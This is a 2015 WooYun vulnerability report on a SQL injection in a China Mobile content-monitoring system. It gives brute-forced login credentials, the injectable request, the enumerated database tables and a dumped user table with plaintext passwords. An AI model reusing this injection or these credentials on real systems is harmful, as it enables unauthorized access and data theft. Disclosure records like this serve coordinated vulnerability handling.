当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152395

漏洞标题:中国移动不良信息拨测系统SQL注入漏洞(内容让人羞羞)

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2015-11-06 18:22

修复时间:2015-12-25 10:32

公开时间:2015-12-25 10:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-06: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经确认,细节仅向厂商公开
2015-11-20: 细节向核心白帽子及相关领域专家公开
2015-11-30: 细节向普通白帽子公开
2015-12-10: 细节向实习白帽子公开
2015-12-25: 细节向公众公开

简要描述:

中国移动不良信息拨测系统sql注入漏洞

详细说明:

**.**.**.**:11222/ncss/
爆破之
wanghua 123456

GET /ncss/auditmana/webTree.do?tr=listWebSites&treeId=**.**.**.*** HTTP/1.1
Host: **.**.**.**:11222
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=8D4D5550134B823EFFF04AEF85533DCE
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3


available databases [3]:
[*] information_schema
[*] ncss
[*] test

Database: ncss                                                                                                         
[1020 tables]
+---------------------------------+
| acquisition_conf_policy |
| alarm_forward_info |
| alarm_info |
| alarm_msg_his |
| alarm_msg_info |
| alarm_msg_per |
| alarm_policy |
| alarm_report_datas |
| alarm_report_his |
| alarm_report_info |
| alarm_rule |
| area_info |
| audit_statinfo |
| audit_user_count |
| con_test |
| daily_audit_time_report |
| data_storage_sheet |
| day_audit_time_report |
| day_bidwinning_amount |
| day_hostname_stat |
| day_hostname_stat_0111 |
| day_report_audit_area_monitor |
| day_report_audit_info |
| day_report_audit_visitsrank |
| day_server_stat |
| day_work_load_report |
| department |
| domain_tree |
| downloadblack |
| equip_conf_send_status |
| evidence |
| evidence_video |
| front_acquisition_policy |
| front_image_policy |
| front_info |
| front_keyword_policy |
| front_text_policy |
| host_display |
| host_reason |
| host_time_baseinfo |
| hostname_test |
| hour_hostname_0105rd |
| hour_hostname_stat |
| hour_server_stat |
| idc_room |
| image_conf_policy |
| image_conf_send_status |
| ip_area |
| keyword |
| keyword_conf_policy |
| keyword_conf_send_status |
| keyword_copy |
| keyword_policy_type |
| keyword_type |
| log_black_list_submit |
| log_black_list_submit_item |
| log_record |
| log_sys_record |
| mobile_area |
| month_bidwinning_amount |
| month_hostname_stat |
| month_server_stat |
| ncss_user |
省略...


Table: ncss_user
[3 entries]
admin jhkj9527
wanghua 123456
yaotingting 123

漏洞证明:

屏幕快照 2015-11-06 下午2.40.09.png


屏幕快照 2015-11-06 下午2.41.57.png


屏幕快照 2015-11-06 下午2.44.43.png


屏幕快照 2015-11-06 下午2.47.00.png


屏幕快照 2015-11-06 下午2.49.26.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-10 10:30

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无